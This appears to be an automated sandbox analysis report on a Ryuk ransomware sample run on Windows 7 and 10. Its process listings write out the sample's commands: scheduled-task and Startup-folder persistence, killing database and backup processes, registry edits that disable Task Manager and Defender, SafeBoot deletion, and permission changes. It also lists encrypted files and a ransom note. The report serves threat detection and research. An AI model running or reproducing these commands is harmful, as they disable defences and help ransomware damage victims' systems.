Malware Analysis Report

2024-08-06 09:27

Sample ID 221020-s4bz3scag9
Target 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
SHA256 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
Tags
ryuk discovery evasion ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6

Threat Level: Known bad

The file 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6 was found to be: Known bad.

Malicious Activity Summary

ryuk discovery evasion ransomware

Ryuk

Modifies boot configuration data using bcdedit

Clears Windows event logs

Deletes shadow copies

Disables use of System Restore points

Deletes backup catalog

Disables Task Manager via registry modification

Disables taskbar notifications via registry modification

Drops startup file

Checks computer location settings

Modifies file permissions

Enumerates connected drives

Drops file in Windows directory

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Runs net.exe

Kills process with taskkill

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Interacts with shadow copies

Views/modifies file attributes

Creates scheduled task(s)

Modifies registry class

MITRE ATT&CK Matrix V6

Analysis: static1

Detonation Overview

Reported

2022-10-20 15:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-10-20 15:40

Reported

2022-10-20 15:43

Platform

win7-20220901-en

Max time kernel

137s

Max time network

52s

Command Line

"C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe"

Signatures

Ryuk

ransomware ryuk

Disables Task Manager via registry modification

evasion

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\attrib.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives


Drops file in Program Files directory


Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 860 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 840 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 860 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 860 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 332 wrote to memory of 596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 860 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 612 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 860 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 528 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 528 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 528 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 860 wrote to memory of 700 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 700 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 700 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 700 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 700 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 700 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 860 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 1376 wrote to memory of 460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1376 wrote to memory of 460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1376 wrote to memory of 460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 860 wrote to memory of 288 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 288 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 288 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 288 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 288 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 288 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe C:\Windows\system32\cmd.exe
PID 540 wrote to memory of 304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 540 wrote to memory of 304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 540 wrote to memory of 304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1432 wrote to memory of 1192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe

"C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\system32\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

Network

N/A

Files

C:\ProgramData\ryuk.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

C:\Users\Admin\AppData\Local\Temp\hrmlog1

C:\ProgramData\hrmlog1

C:\ProgramData\hrmlog2

C:\Users\Admin\AppData\Local\Temp\hrmlog2

C:\Users\Admin\AppData\Local\Temp\RYUKID

C:\ProgramData\RYUKID

C:\ProgramData\RyukReadMe.txt

Analysis: behavioral2

Detonation Overview

Submitted

2022-10-20 15:40

Reported

2022-10-20 15:43

Platform

win10v2004-20220901-en

Max time kernel

150s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe"

Signatures

Ryuk

ransomware ryuk

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Disables taskbar notifications via registry modification

evasion

Disables use of System Restore points

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\f: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\sample-thumb.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Trial-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremDemoR_BypassTrial365-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_received.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\chrome-ext-2x.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.properties.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\changelog.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CollectSignatures.aapp.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\spectrum_spinner_process.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl C:\Windows\system32\wbadmin.exe N/A
File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl C:\Windows\system32\wbadmin.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
